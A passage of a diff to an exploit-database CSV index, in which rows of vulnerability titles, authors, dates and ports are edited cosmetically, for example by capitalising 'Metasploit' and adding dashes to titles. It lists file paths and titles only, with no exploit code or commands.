Execution",2014-03-22,metasploit,hardware,remote,22 +32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,Metasploit,windows,remote,0 +32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,Metasploit,php,remote,80 +32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,Metasploit,hardware,remote,22 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass",2008-09-29,Crackers_Child,php,webapps,0 32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0 32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",php,webapps,0 @@ -29283,7 +29283,7 @@ id,file,description,date,author,platform,type,port 32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0 32502,platforms/php/webapps/32502.txt,"GetSimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0 32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 -32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 (task.php) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 +32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - (task.php) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 @@ -29293,7 +29293,7 @@ id,file,description,date,author,platform,type,port 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - (.m3u/.pls/.asx) Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - (.m3u/.pls/.asx) Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 -32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,metasploit,linux,remote,443 +32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,Metasploit,linux,remote,443 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 @@ -29362,7 +29362,7 @@ id,file,description,date,author,platform,type,port 32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server Username Enumeration Weakness",2008-11-14,"Bernardo Damele",windows,remote,0 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 32588,platforms/php/webapps/32588.txt,"BoutikOne CMS 'search_query' Parameter Cross-Site Scripting",2008-11-17,d3v1l,php,webapps,0 -32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80 +32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,Metasploit,php,remote,80 32589,platforms/php/webapps/32589.html,"Kimson CMS 'id' Parameter Cross-Site Scripting",2008-11-18,md.r00t,php,webapps,0 32590,platforms/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",windows,local,0 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0 @@ -29473,7 +29473,7 @@ id,file,description,date,author,platform,type,port 32697,platforms/linux/dos/32697.pl,"aMSN - (.ctt) Remote Denial of Service",2009-01-03,Hakxer,linux,dos,0 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection",2009-01-05,Ehsan_Hp200,php,webapps,0 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",windows,remote,0 -32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation",2014-04-04,metasploit,linux,local,0 +32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation",2014-04-04,Metasploit,linux,local,0 32701,platforms/php/webapps/32701.txt,"WordPress XCloner Plugin 3.1.0 - CSRF",2014-04-04,"High-Tech Bridge SA",php,webapps,80 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent",2014-04-05,Vulnerability-Lab,ios,webapps,0 @@ -29493,10 +29493,10 @@ id,file,description,date,author,platform,type,port 32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0 32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0 32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 - 'login.php' SQL Injection",2009-01-14,darkjoker,php,webapps,0 -32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector - Directory Traversal",2014-04-07,metasploit,windows,remote,8080 +32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector - Directory Traversal",2014-04-07,Metasploit,windows,remote,8080 32726,platforms/linux/dos/32726.txt,"Ganglia gmetad <= 3.0.6 - 'process_path()' Remote Stack Buffer Overflow",2009-01-15,"Spike Spiegel",linux,dos,0 -32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 -32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 /modules/rss/handler_image.php i Parameter XSS",2009-01-15,waraxe,php,webapps,0 +32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 +32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter XSS",2009-01-15,waraxe,php,webapps,0 32729,platforms/asp/webapps/32729.txt,"LinksPro 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 32730,platforms/asp/webapps/32730.txt,"Active Bids search.asp search Parameter XSS",2009-01-15,Pouya_Server,asp,webapps,0 32731,platforms/asp/webapps/32731.txt,"Active Bids search.asp search Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 @@ -29518,8 +29518,8 @@ id,file,description,date,author,platform,type,port 32749,platforms/linux/dos/32749.txt,"Pidgin <= 2.4.2 - 'msn_slplink_process_msg()' Denial of Service",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32750,platforms/asp/webapps/32750.txt,"OBLOG 'err.asp' Cross-Site Scripting",2009-01-23,arash.setayeshi,asp,webapps,0 32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0 -32752,platforms/windows/local/32752.rb,"WinRAR Filename Spoofing",2014-04-08,metasploit,windows,local,0 -32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm Unauthenticated Command Injection",2014-04-08,metasploit,hardware,remote,0 +32752,platforms/windows/local/32752.rb,"WinRAR Filename Spoofing",2014-04-08,Metasploit,windows,local,0 +32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm Unauthenticated Command Injection",2014-04-08,Metasploit,hardware,remote,0 32754,platforms/osx/dos/32754.c,"MacOS X 10.9 Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0 32756,platforms/asp/webapps/32756.txt,"LDF 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 @@ -29553,12 +29553,12 @@ id,file,description,date,author,platform,type,port 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router Admin Password CSRF",2014-04-30,"shyamkumar somana",hardware,webapps,80 33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 login.php goto Parameter XSS",2009-07-27,Moudi,php,webapps,0 -32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",2014-04-10,metasploit,unix,remote,443 +32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",2014-04-10,Metasploit,unix,remote,443 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80 -32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,metasploit,windows,local,0 -32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,metasploit,php,remote,80 +32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,Metasploit,windows,local,0 +32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,Metasploit,php,remote,80 32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet Directory Traversal",2009-02-10,"Terry Froy",linux,remote,0 32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'Login.asp' Multiple SQL Injection Vulnerabilities",2009-02-10,"Francesco Bianchino",asp,webapps,0 @@ -29584,7 +29584,7 @@ id,file,description,date,author,platform,type,port 32819,platforms/php/webapps/32819.txt,"Parsi PHP CMS 2.0 - 'index.php' SQL Injection",2009-02-26,Cru3l.b0y,php,webapps,0 32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x PKCS#11 Implementation Unauthorized Access",2009-02-26,"Andreas Jellinghaus",linux,local,0 32821,platforms/java/webapps/32821.html,"APC PowerChute Network Shutdown HTTP Response Splitting and Cross-Site Scripting Vulnerabilities",2009-02-26,"Digital Security Research Group",java,webapps,0 -32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,metasploit,windows,remote,0 +32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,Metasploit,windows,remote,0 32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 @@ -29632,7 +29632,7 @@ id,file,description,date,author,platform,type,port 32866,platforms/ios/webapps/32866.txt,"PDF Album 1.7 iOS - File Include Web",2014-04-14,Vulnerability-Lab,ios,webapps,0 32867,platforms/php/webapps/32867.txt,"WordPress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32868,platforms/php/webapps/32868.txt,"WordPress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 -32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console Command Injection",2014-04-14,metasploit,linux,webapps,10080 +32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console Command Injection",2014-04-14,Metasploit,linux,webapps,10080 32870,platforms/cgi/webapps/32870.txt,"AWStats <= 6.4 - 'awstats.pl' Multiple Path Disclosure",2009-04-19,r0t,cgi,webapps,0 32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0 32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0 @@ -29651,7 +29651,7 @@ id,file,description,date,author,platform,type,port 32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE",2014-04-15,"Brandon Perry",unix,remote,443 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross-Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0 -32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0 +32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Local Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 @@ -29677,8 +29677,8 @@ id,file,description,date,author,platform,type,port 32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0 32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0 32919,platforms/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",hardware,remote,0 -32920,platforms/multiple/remote/32920.txt,"Apache Geronimo 2.1.x /console/portal/Server/Monitoring Multiple Parameter XSS",2009-04-16,DSecRG,multiple,remote,0 -32921,platforms/multiple/remote/32921.txt,"Apache Geronimo 2.1.x /console/portal/ URI XSS",2009-04-16,DSecRG,multiple,remote,0 +32920,platforms/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - /console/portal/Server/Monitoring Multiple Parameter XSS",2009-04-16,DSecRG,multiple,remote,0 +32921,platforms/multiple/remote/32921.txt,"Apache Geronimo 2.1.x - /console/portal/ URI XSS",2009-04-16,DSecRG,multiple,remote,0 32922,platforms/multiple/remote/32922.html,"Apache Geronimo 2.1.x - Multiple Admin Function CSRF",2009-04-16,DSecRG,multiple,remote,0 32923,platforms/windows/remote/32923.cs,"MiniWeb 0.8.19 - Remote Buffer Overflow",2009-04-16,e.wiZz!,windows,remote,0 32924,platforms/php/webapps/32924.txt,"razorCMS 0.3RC2 - Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps,0 @@ -29688,7 +29688,7 @@ id,file,description,date,author,platform,type,port 32928,platforms/php/webapps/32928.txt,"Malleo 1.2.3 - 'admin.php' Local File Include",2009-04-17,Drosophila,php,webapps,0 32929,platforms/linux/remote/32929.txt,"Red Hat Stronghold Web Server 2.3 - Cross-Site Scripting",2009-04-20,"Xia Shing Zee",linux,remote,0 32930,platforms/php/webapps/32930.txt,"CMSimple 4.4/4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80 -32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 (Firmware) 'administration.cgi' Access Validation",2009-04-20,"Gabriel Lima",hardware,remote,0 +32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 - (Firmware) 'administration.cgi' Access Validation",2009-04-20,"Gabriel Lima",hardware,remote,0 32932,platforms/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Parameter Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 32933,platforms/php/webapps/32933.txt,"Online Contact Manager 3.0 index.php showGroup Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0 32934,platforms/php/webapps/32934.txt,"Online Contact Manager 3.0 view.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0 @@ -29716,7 +29716,7 @@ id,file,description,date,author,platform,type,port 32956,platforms/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 File Handling Remote Denial of Service",2009-04-27,"Abdul-Aziz Hariri",windows,dos,0 32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal and Arbitrary File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 32958,platforms/php/webapps/32958.txt,"MataChat 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 -32959,platforms/windows/remote/32959.rb,"Adobe Flash Player Regular Expression Heap Overflow",2014-04-21,metasploit,windows,remote,0 +32959,platforms/windows/remote/32959.rb,"Adobe Flash Player Regular Expression Heap Overflow",2014-04-21,Metasploit,windows,remote,0 33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML-Injection and Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun()' Remote Memory Corruption",2009-04-27,"Marc Gueury",linux,dos,0 @@ -29824,7 +29824,7 @@ id,file,description,date,author,platform,type,port 33066,platforms/windows/remote/33066.html,"Avax Vector 1.3 - 'avPreview.ocx' ActiveX Control Buffer Overflow",2009-06-06,Satan_HackerS,windows,remote,0 33067,platforms/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",multiple,remote,0 33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Parameter Cross-Site Scripting",2009-06-06,"599eme Man",php,webapps,0 -33069,platforms/windows/local/33069.rb,"Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow",2014-04-28,metasploit,windows,local,0 +33069,platforms/windows/local/33069.rb,"Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow",2014-04-28,Metasploit,windows,local,0 33070,platforms/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution Exploit",2014-04-28,LOTFREE,php,webapps,80 33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0 33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80 @@ -29852,7 +29852,7 @@ id,file,description,date,author,platform,type,port 33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Include",2009-07-16,MustLive,multiple,remote,0 33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 Heap Buffer Overflow",2010-01-29,"Evgeny Legerov",multiple,dos,0 33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0 -33095,platforms/windows/remote/33095.rb,"Adobe Flash Player Type Confusion Remote Code Execution",2014-04-29,metasploit,windows,remote,0 +33095,platforms/windows/remote/33095.rb,"Adobe Flash Player Type Confusion Remote Code Execution",2014-04-29,Metasploit,windows,remote,0 33096,platforms/multiple/dos/33096.txt,"Crysis 1.21/1.5 HTTP/XML-RPC Service Access Violation Remote Denial of Service",2009-06-20,"Luigi Auriemma",multiple,dos,0 33097,platforms/php/webapps/33097.txt,"Programs Rating rate.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0 33098,platforms/php/webapps/33098.txt,"Programs Rating postcomments.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0 @@ -29898,7 +29898,7 @@ id,file,description,date,author,platform,type,port 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Stored XSS",2014-05-01,"Dolev Farhi",hardware,webapps,0 33584,platforms/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service",2010-01-31,"Evgeny Legerov",multiple,dos,0 -33142,platforms/multiple/remote/33142.rb,"Apache Struts ClassLoader Manipulation Remote Code Execution",2014-05-02,metasploit,multiple,remote,8080 +33142,platforms/multiple/remote/33142.rb,"Apache Struts ClassLoader Manipulation Remote Code Execution",2014-05-02,Metasploit,multiple,remote,8080 33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation",2014-05-02,"Brandon Perry",hardware,remote,443 33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0 @@ -29963,8 +29963,8 @@ id,file,description,date,author,platform,type,port 33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 - Authentication Bypass",2009-09-03,Intevydis,jsp,webapps,0 33210,platforms/multiple/remote/33210.txt,"HP Operations Manager Default Manager 8.1 Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 Portal Default Manager Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 -33212,platforms/windows/remote/33212.rb,"Adobe Flash Player Integer Underflow Remote Code Execution",2014-05-06,metasploit,windows,remote,0 -33213,platforms/windows/local/33213.rb,"Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,metasploit,windows,local,0 +33212,platforms/windows/remote/33212.rb,"Adobe Flash Player Integer Underflow Remote Code Execution",2014-05-06,Metasploit,windows,remote,0 +33213,platforms/windows/local/33213.rb,"Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,Metasploit,windows,local,0 33214,platforms/php/webapps/33214.txt,"DvBBS 2.0 - 'boardrule.php' SQL Injection",2009-09-04,Securitylab.ir,php,webapps,0 33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 User Profile HTML Injection",2009-08-26,IBM,multiple,remote,0 33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",hardware,dos,0 @@ -30078,9 +30078,9 @@ id,file,description,date,author,platform,type,port 33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0 33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - search.php from_date_day Parameter Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent XSS Vulnerabilities",2014-05-12,"Dolev Farhi",windows,webapps,80 -33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",2014-05-12,metasploit,windows,remote,34205 +33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",2014-05-12,Metasploit,windows,remote,34205 33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 -33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0 +33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,Metasploit,windows,remote,0 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0 @@ -30212,7 +30212,7 @@ id,file,description,date,author,platform,type,port 33518,platforms/hardware/webapps/33518.txt,"ZyXEL P-660HW-T1 3 Wireless Router - CSRF",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 -33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming Arbitrary File Upload",2014-05-26,metasploit,multiple,remote,9855 +33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming Arbitrary File Upload",2014-05-26,Metasploit,multiple,remote,9855 33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Remote Directory Traversal",2010-02-08,Markot,windows,remote,0 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0 33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0 @@ -30275,7 +30275,7 @@ id,file,description,date,author,platform,type,port 33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component - 'gamblingEvent' Parameter SQL Injection",2010-02-01,md.r00t,php,webapps,0 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0 -33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200 +33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,Metasploit,java,remote,9200 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0 33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0 33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting",2010-02-04,s4r4d0,php,webapps,0 @@ -30416,7 +30416,7 @@ id,file,description,date,author,platform,type,port 33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit <= 1.4.1 dijit\tests\_testCommon.js theme Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit <= 1.4.1 doh\runner.html Multiple Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 33766,platforms/php/webapps/33766.txt,"Joomla! 'com_as' Component - 'catid' Parameter SQL Injection",2010-03-16,N2n-Hacker,php,webapps,0 -33767,platforms/novell/remote/33767.rb,"Novell eDirectory 8.8.5 DHost Weak Session Cookie Session Hijacking",2010-03-14,metasploit,novell,remote,0 +33767,platforms/novell/remote/33767.rb,"Novell eDirectory 8.8.5 DHost Weak Session Cookie Session Hijacking",2010-03-14,Metasploit,novell,remote,0 33787,platforms/php/webapps/33787.txt,"RepairShop2 index.php Prod Parameter 